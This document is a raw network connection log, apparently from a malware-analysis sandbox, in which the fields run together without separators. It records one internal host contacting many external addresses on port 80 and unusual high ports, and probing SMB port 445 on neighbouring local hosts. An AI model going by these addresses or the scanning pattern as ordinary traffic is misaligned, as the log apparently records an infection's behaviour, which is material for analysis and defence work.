                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.111157894 CEST4981580192.168.11.3034.111.176.156
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.113224983 CEST4981580192.168.11.3034.111.176.156
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.137845039 CEST4981713918192.168.11.30114.25.71.193
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.242940903 CEST804981534.111.176.156192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.262157917 CEST4981880192.168.11.3035.164.78.200
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.453071117 CEST4981980192.168.11.3031.13.67.35
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.467858076 CEST1391849817114.25.71.193192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.538863897 CEST804981835.164.78.200192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.539112091 CEST4981880192.168.11.3035.164.78.200
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.542615891 CEST4981880192.168.11.3035.164.78.200
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.582798958 CEST804981931.13.67.35192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.583039045 CEST4981980192.168.11.3031.13.67.35
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.588140011 CEST4981980192.168.11.3031.13.67.35
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.718425035 CEST804981931.13.67.35192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.718518972 CEST804981931.13.67.35192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.718626022 CEST804981931.13.67.35192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.718813896 CEST4981980192.168.11.3031.13.67.35
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.720505953 CEST4981980192.168.11.3031.13.67.35
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.722729921 CEST4982080192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.819224119 CEST804981835.164.78.200192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.819334030 CEST804981835.164.78.200192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.819726944 CEST804981835.164.78.200192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.820055008 CEST4981880192.168.11.3035.164.78.200
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.823591948 CEST4981880192.168.11.3035.164.78.200
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.850197077 CEST804981931.13.67.35192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.851749897 CEST8049820104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.852818966 CEST4982080192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.855096102 CEST4982080192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.978293896 CEST4981713918192.168.11.30114.25.71.193
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.983392954 CEST8049820104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:25.000981092 CEST8049820104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:25.001034975 CEST8049820104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:25.001058102 CEST8049820104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:25.001080036 CEST8049820104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:25.001188040 CEST4982080192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:25.001188040 CEST4982080192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:25.002053976 CEST8049820104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:25.002193928 CEST4982080192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:25.012926102 CEST4982080192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:25.100253105 CEST804981835.164.78.200192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:25.305879116 CEST1391849817114.25.71.193192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:25.806216002 CEST4981713918192.168.11.30114.25.71.193
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:25.814349890 CEST4982180192.168.11.3085.214.228.140
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:26.027127028 CEST4982280192.168.11.30104.27.206.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:26.074188948 CEST804982185.214.228.140192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:26.074388027 CEST4982180192.168.11.3085.214.228.140
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:26.076550007 CEST4982180192.168.11.3085.214.228.140
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:26.134969950 CEST1391849817114.25.71.193192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:26.156415939 CEST8049822104.27.206.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:26.156553984 CEST4982280192.168.11.30104.27.206.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:26.159084082 CEST4982280192.168.11.30104.27.206.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:26.288374901 CEST8049822104.27.206.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:26.307447910 CEST8049822104.27.206.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:26.307601929 CEST8049822104.27.206.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:26.307764053 CEST4982280192.168.11.30104.27.206.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:26.314801931 CEST4982280192.168.11.30104.27.206.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:26.338108063 CEST804982185.214.228.140192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:26.339117050 CEST804982185.214.228.140192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:26.339226961 CEST804982185.214.228.140192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:26.339355946 CEST4982180192.168.11.3085.214.228.140
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:26.340445995 CEST4982180192.168.11.3085.214.228.140
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:26.649796009 CEST4981713918192.168.11.30114.25.71.193
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:26.978795052 CEST1391849817114.25.71.193192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:27.493376017 CEST4981713918192.168.11.30114.25.71.193
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:27.822752953 CEST1391849817114.25.71.193192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:28.873507023 CEST4982580192.168.11.30208.100.26.245
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.015845060 CEST4982622027192.168.11.30178.90.73.188
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.031713963 CEST8049825208.100.26.245192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.031924009 CEST4982580192.168.11.30208.100.26.245
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.034244061 CEST4982580192.168.11.30208.100.26.245
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.201381922 CEST8049825208.100.26.245192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.201827049 CEST8049825208.100.26.245192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.201848984 CEST8049825208.100.26.245192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.201994896 CEST4982580192.168.11.30208.100.26.245
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.203644991 CEST4982580192.168.11.30208.100.26.245
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.350341082 CEST2202749826178.90.73.188192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.606262922 CEST4982780192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.734359980 CEST8049827104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.734498024 CEST4982780192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.736737013 CEST4982780192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.852154016 CEST4982622027192.168.11.30178.90.73.188
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.864798069 CEST8049827104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.880258083 CEST8049827104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.880287886 CEST8049827104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.880307913 CEST8049827104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.880330086 CEST8049827104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.880511045 CEST4982780192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.880625963 CEST8049827104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.880769014 CEST4982780192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.886435986 CEST4982780192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:30.190551043 CEST2202749826178.90.73.188192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:30.419259071 CEST4982880192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:30.622585058 CEST8049828162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:30.695703983 CEST4982622027192.168.11.30178.90.73.188
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:31.032820940 CEST2202749826178.90.73.188192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:31.133115053 CEST4982880192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:31.334639072 CEST8049828162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:31.539266109 CEST4982622027192.168.11.30178.90.73.188
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:31.836106062 CEST4982880192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:31.873452902 CEST2202749826178.90.73.188192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:32.037581921 CEST8049828162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:32.382828951 CEST4982622027192.168.11.30178.90.73.188
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:32.539073944 CEST4982880192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:32.717015028 CEST2202749826178.90.73.188192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:32.740537882 CEST8049828162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:32.932266951 CEST4983180192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:33.061413050 CEST8049831104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:33.061613083 CEST4983180192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:33.064106941 CEST4983180192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:33.192878962 CEST8049831104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:33.207948923 CEST8049831104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:33.207993031 CEST8049831104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:33.208008051 CEST8049831104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:33.208139896 CEST8049831104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:33.208179951 CEST4983180192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:33.208344936 CEST8049831104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:33.208795071 CEST4983180192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:33.208795071 CEST4983180192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:33.215476036 CEST4983180192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:33.242012024 CEST4982880192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:33.443288088 CEST8049828162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:33.897181034 CEST4983241100192.168.11.3089.215.115.4
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:34.228988886 CEST4983380192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:34.357969046 CEST8049833172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:34.358187914 CEST4983380192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:34.361063004 CEST4983380192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:34.489459038 CEST8049833172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:34.503163099 CEST8049833172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:34.503340006 CEST8049833172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:34.503485918 CEST4983380192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:34.514848948 CEST4983380192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:34.897883892 CEST4983241100192.168.11.3089.215.115.4
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:35.525268078 CEST4983480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:35.653934002 CEST8049834104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:35.654109955 CEST4983480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:35.656472921 CEST4983480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:35.785623074 CEST8049834104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:35.819214106 CEST8049834104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:35.819267035 CEST8049834104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:35.819415092 CEST4983480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:35.819942951 CEST8049834104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:35.820050001 CEST8049834104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:35.820070028 CEST8049834104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:35.820250034 CEST4983480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:35.824384928 CEST4983480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:36.418750048 CEST49836445192.168.11.30192.168.11.2
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:36.913079977 CEST4983241100192.168.11.3089.215.115.4
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:37.428540945 CEST49836445192.168.11.30192.168.11.2
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:38.107388973 CEST4983880192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:38.238141060 CEST8049838104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:38.238390923 CEST4983880192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:38.240591049 CEST4983880192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:38.368957996 CEST8049838104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:38.405069113 CEST8049838104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:38.405095100 CEST8049838104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:38.405221939 CEST4983880192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:38.411865950 CEST4983880192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:39.443722963 CEST49836445192.168.11.30192.168.11.2
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:40.087851048 CEST4984033325192.168.11.3041.47.39.184
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:40.428386927 CEST49841445192.168.11.30192.168.11.3
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:40.430876970 CEST4984280192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:40.560193062 CEST8049842172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:40.560386896 CEST4984280192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:40.562753916 CEST4984280192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:40.691701889 CEST8049842172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:40.723990917 CEST8049842172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:40.724991083 CEST8049842172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:40.725141048 CEST4984280192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:40.731420040 CEST4984280192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:41.099581003 CEST4984033325192.168.11.3041.47.39.184
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:41.427649975 CEST49841445192.168.11.30192.168.11.3
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:41.742388964 CEST4984380192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:41.871525049 CEST8049843104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:41.871682882 CEST4984380192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:41.874092102 CEST4984380192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:42.003355026 CEST8049843104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:42.018630981 CEST8049843104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:42.019290924 CEST8049843104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:42.019421101 CEST4984380192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:42.026349068 CEST4984380192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:43.039022923 CEST4984480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:43.114700079 CEST4984033325192.168.11.3041.47.39.184
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:43.168188095 CEST8049844104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:43.168874025 CEST4984480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:43.171327114 CEST4984480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:43.299724102 CEST8049844104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:43.318856955 CEST8049844104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:43.318959951 CEST8049844104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:43.319073915 CEST8049844104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:43.319150925 CEST4984480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:43.319186926 CEST8049844104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:43.319351912 CEST4984480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:43.319988012 CEST8049844104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:43.320138931 CEST4984480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:43.324120045 CEST4984480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:43.442828894 CEST49841445192.168.11.30192.168.11.3
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:44.442871094 CEST49845445192.168.11.30192.168.11.4
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:45.292699099 CEST4984780192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:45.457936049 CEST49845445192.168.11.30192.168.11.4
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:45.476301908 CEST4984880192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:45.495054960 CEST8049847162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:45.606981039 CEST8049848104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:45.607237101 CEST4984880192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:45.609272003 CEST4984880192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:45.738652945 CEST8049848104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:45.757122993 CEST8049848104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:45.762929916 CEST4984880192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:45.763927937 CEST8049848104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:45.764027119 CEST4984880192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:46.004750967 CEST4984780192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:46.208110094 CEST8049847162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:46.284784079 CEST4984929925192.168.11.3085.217.219.168
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:46.723299026 CEST4984780192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:46.772892952 CEST4985080192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:46.901905060 CEST8049850104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:46.902062893 CEST4985080192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:46.904325008 CEST4985080192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:46.925785065 CEST8049847162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:47.034538984 CEST8049850104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:47.050240040 CEST8049850104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:47.050542116 CEST8049850104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:47.050668001 CEST4985080192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:47.059210062 CEST4985080192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:47.285729885 CEST4984929925192.168.11.3085.217.219.168
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:47.426309109 CEST4984780192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:47.473192930 CEST49845445192.168.11.30192.168.11.4
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:47.628381014 CEST8049847162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:48.069602013 CEST4985180192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:48.129298925 CEST4984780192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:48.198445082 CEST8049851104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:48.198638916 CEST4985180192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:48.200788975 CEST4985180192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:48.328577042 CEST8049851104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:48.331372976 CEST8049847162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:48.354157925 CEST8049851104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:48.354233980 CEST8049851104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:48.354248047 CEST8049851104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:48.354599953 CEST8049851104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:48.354840994 CEST4985180192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:48.354917049 CEST4985180192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:48.355179071 CEST8049851104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:48.355395079 CEST4985180192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:48.361996889 CEST4985180192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:48.457583904 CEST49852445192.168.11.30192.168.11.5
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:49.300862074 CEST4984929925192.168.11.3085.217.219.168
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:49.366061926 CEST4985380192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:49.472743034 CEST49852445192.168.11.30192.168.11.5
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:49.494848967 CEST8049853104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:49.495037079 CEST4985380192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:49.497767925 CEST4985380192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:49.626017094 CEST8049853104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:49.638871908 CEST8049853104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:49.638951063 CEST8049853104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:49.639115095 CEST4985380192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:49.639137030 CEST8049853104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:49.639149904 CEST8049853104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:49.639324903 CEST4985380192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:49.645541906 CEST4985380192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:49.646094084 CEST8049853104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:49.646306038 CEST4985380192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:50.354988098 CEST4985480192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:50.568675041 CEST8049854162.249.65.164192.168.11.30
